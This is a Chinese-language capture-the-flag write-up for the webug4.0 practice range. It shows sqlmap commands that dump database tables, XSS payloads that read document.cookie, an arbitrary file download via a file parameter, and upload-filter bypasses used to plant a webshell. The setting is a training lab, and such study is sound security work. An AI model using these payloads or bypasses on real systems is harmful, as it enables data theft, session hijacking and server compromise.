webug4.0靶场通关笔记

这篇具有很好参考价值的文章主要介绍了webug4.0靶场通关笔记。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


注入

显错注入

随便加个符号,直接就爆出了SQL语句和闭合方式
webug4.0靶场通关笔记,网络安全,web安全
很明显参数id存在sql注入,上sqlmap,这里是登录后才能打开这个网页,直接把数据包保存至kali桌面,数据包保存为1.txt

爆数据库,爆表
sqlmap -r 1.txt --dbs  
sqlmap -r 1.txt -D webug --tables    

webug4.0靶场通关笔记,网络安全,web安全
webug4.0靶场通关笔记,网络安全,web安全

爆字段
sqlmap -r 1.txt -D webug -T flag --cloumns 

webug4.0靶场通关笔记,网络安全,web安全

查看flag
sqlmap -r 1.txt -D webug -T flag -C flag --dump 

webug4.0靶场通关笔记,网络安全,web安全

布尔注入

打开靶场地址,把id参数改为-1,发现跟1比起来,内容缩短了一些,回显不一样
webug4.0靶场通关笔记,网络安全,web安全
保存数据包到sqlmap跑一下,跟上关差不多,因为用到是基于时间的盲注,所以会很费时间
webug4.0靶场通关笔记,网络安全,web安全

sqlmap -r 1.txt --dump -D webug -T flag -C flag  

webug4.0靶场通关笔记,网络安全,web安全

延时注入

跟上个一样,很费时间

post注入

搜索框输入1’ 会报错,注入点在这
webug4.0靶场通关笔记,网络安全,web安全
猜字段

1' order by 3--+
1' order by 2--+

sqlmap

sqlmap -r '1.txt' -D webug -T flag -C flag --dump

过滤注入

同上,并没有过滤

宽字节注入

xxe注入

csv注入

万能密码登陆

密码处直接填写pyload
webug4.0靶场通关笔记,网络安全,web安全

XSS

反射型xss

直接在url添加pyload
webug4.0靶场通关笔记,网络安全,web安全

存储型xss

留言处添加pyload,之后刷新一下网页,就弹出来了
webug4.0靶场通关笔记,网络安全,web安全

DOM型xss

输入框随意输入些东西,看一下位置value=“111”
webug4.0靶场通关笔记,网络安全,web安全
构造pyload,点击搜索即可

"><script>alert(document.cookie)</script><

webug4.0靶场通关笔记,网络安全,web安全

过滤xss

只是过滤了script,换个就是

<img src=1 onerror=alert(document.cookie)>

webug4.0靶场通关笔记,网络安全,web安全

链接注入

构造pyload,点一下直接跳转到百度

<a%20href="http://baidu.com"><h5>点我点我点我点我点我点我</h5></a>

webug4.0靶场通关笔记,网络安全,web安全

任意文件下载

任意文件下载

右击下载看一下链接地址
webug4.0靶场通关笔记,网络安全,web安全

http://192.168.0.130/webug/control/filedownload/file_download.php?file=template/assets/img/1.txt

看到file协议使用不当就可能会造成任意文件下载,这里构造pyload试一下

file=/index.php

果然下载成功
webug4.0靶场通关笔记,网络安全,web安全

mysql配置文件下载

上传漏洞

文件上传(前端拦截)

F12可以看到对上传的文件进行了后缀限制
webug4.0靶场通关笔记,网络安全,web安全
把shell后缀改成png格式,抓包,在数据包中在改回php格式
webug4.0靶场通关笔记,网络安全,web安全
上传成功
webug4.0靶场通关笔记,网络安全,web安全
冰蝎连接成功
webug4.0靶场通关笔记,网络安全,web安全

文件上传(解析漏洞)

这里我试了空格或者“.”绕过,::$DATA绕过,双后缀名绕过,%00截断但是都不可以,这里可以使用生僻字进行绕过,比如这个 龘(dá),在repeater里面将文件名改为 shell.php龘.jpg,发现上传成功,这是因为他无法对这个字进行编码,所以后面的信息全部被过滤掉了。最后就变成了php文件,人家是成功了,但我还是不行
webug4.0靶场通关笔记,网络安全,web安全

文件上传(畸形文件)

双写绕过
webug4.0靶场通关笔记,网络安全,web安全

文件上传(截断上传)

人家的,我依然不可以
webug4.0靶场通关笔记,网络安全,web安全

文件上传(htaccess)

代码有问题,跳过

逻辑漏洞

越权修改密码

万能密码
webug4.0靶场通关笔记,网络安全,web安全

支付漏洞

直接价格改成-1
webug4.0靶场通关笔记,网络安全,web安全
这就成功了,离谱

webug4.0靶场通关笔记,网络安全,web安全

邮箱轰炸

随便输入一个邮箱,因为没有任何防御措施,很可能造成邮箱轰炸,跟短信炸弹一个道理
webug4.0靶场通关笔记,网络安全,web安全

越权查看admin

所谓越权就是用普通用户拥有管理员用户的权限,比如user的id=1,管理员的id=0,通过抓包修改这个参数,就可以达到越权的目的

其它

url跳转

更改url的跳转地址
webug4.0靶场通关笔记,网络安全,web安全
webug4.0靶场通关笔记,网络安全,web安全

文件包含

打开靶场,看到这个url,这。。。太明显了阿
webug4.0靶场通关笔记,网络安全,web安全
配合一下刚刚的文件上传,直接就执行了phpinfo
webug4.0靶场通关笔记,网络安全,web安全

结束

webug4.0靶场通关笔记,网络安全,web安全文章来源地址https://www.toymoban.com/news/detail-557373.html

到了这里,关于webug4.0靶场通关笔记的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【安全学习】-网络安全靶场实训演练系统建设方案

    第1章需求分析 1.1建设需求 1.2建设目标与内容 第2章系统整体建设 2.1设计思想 2.2建设目标 2.3架构设计 2.4系统设计 2.4.1基础平台系统设计 2.4.2实训分系统设计 2.4.3考核分系统设计 2.4.4拓扑设计分系统设计 2.4.5模拟仿真系统设计 2.4.5.1网络仿真 2.4.5.2安全仿真 2.4.5.3系统监控 2.

    2024年02月03日
    浏览(45)
  • 16个网络安全常用的练习靶场(小白必备)

    DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 链接地址:http://www.dvwa.co.uk mutillidaemutillidae是一个免费,开源的Web应用程序,提供专门被允许的安全测试和入侵的Web应用程序。它是由Adrian “Ironge

    2024年02月02日
    浏览(66)
  • 【网络安全】DVWA靶场实战&BurpSuite内网渗透

    我们先来认识一下BurpSuite中有哪些攻击模式,然后开始实战操作 下面攻击案例即将使用,对单个参数进行攻击破解 联想战争中狙击手的作用,一次只能击杀一名敌人 联想古代的攻城锤,特点就是攻击范围比狙击手大,但是效率不一定高 可以设置多个攻击字段,但是payload值

    2024年02月13日
    浏览(56)
  • 【网络安全 --- 文件上传靶场练习】文件上传靶场安装以及1-5关闯关思路及技巧,源码分析

      首先分享一个自己做的很不错的网路安全笔记,内容详细介绍了许多知识 超详细的网络安全笔记 分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记​编辑https://m.tb.cn/h.5JdFcih?tk=OuVrWRl9vMx%20CZ3457 若已安装,请

    2024年02月06日
    浏览(48)
  • 如何利用在线网络靶场将安全提升至新水平

    在 Standoff 365 的在线网络靶场中,任何公司都可以试验信息安全手段和企业网络设置,优化攻击检测、响应和事件调查的技能。 2023 年,我们不仅准许攻击者使用,也准许防御者使用。我们可以根据客户要求轻松部署 10 个细分行业中的任一行业,或帮助公司重建他们自己

    2024年01月20日
    浏览(54)
  • [网络安全]upload-labs 本地靶场搭建详细教程

    本文以phpstudy搭建upload-labs本地靶场环境 PhpStudy是一个PHP调试环境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安装后无须配置即可使用。 官网安装地址: PhpStudy Download 链接 安装完成后打开PhpStudy 网站配置如下: upload-labs 靶机下载地址: https://github.co

    2024年02月08日
    浏览(63)
  • [网络安全]xss-labs 本地靶场搭建详细教程

    本文以phpstudy搭建xss-labs本地靶场环境 PhpStudy是一个PHP调试环境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安装后无须配置即可使用。 官网安装地址: PhpStudy Download 链接 安装完成后打开PhpStudy 网站配置如下: xss-labs 靶机下载地址: https://github.com/do0d

    2024年02月08日
    浏览(40)
  • 网络安全技术新手入门:在docker上安装dvwa靶场

    准备工作:1.已经安装好kali linux 步骤总览:1.安装好docker     2.拖取镜像,安装dvwa 输入命令: sudo su 输入命令: curl  -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - 输入命令: echo \\\'deb https://download.docker.com/linux/debian stretch stable\\\' /etc/apt/sources.list.d/docker.list tips:此处

    2024年01月20日
    浏览(40)
  • [网络安全]XSS之Cookie外带攻击姿势及例题详析(基于DVWA靶场)

    本文仅分享XSS攻击知识,不承担任何法律责任。 本文涉及的软件等请读者自行安装,本文不再赘述。 XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而 窃取用户的 Cookie 信息 。 在使用XSS语

    2024年02月08日
    浏览(53)
  • iwebsec靶场 命令执行漏洞通关笔记

    iwebsec靶场的命令执行通关笔记,共有五个关卡,分别涉及到基础的命令执行漏洞、空格绕过、绕过、通配符绕过、base64绕过共五方面的渗透。 什么是命令执行漏洞?命令执行漏洞是服务器端没有对客户端用户输入的参数进行过滤,导致用户可以通过任意拼接系统命令

    2024年02月10日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包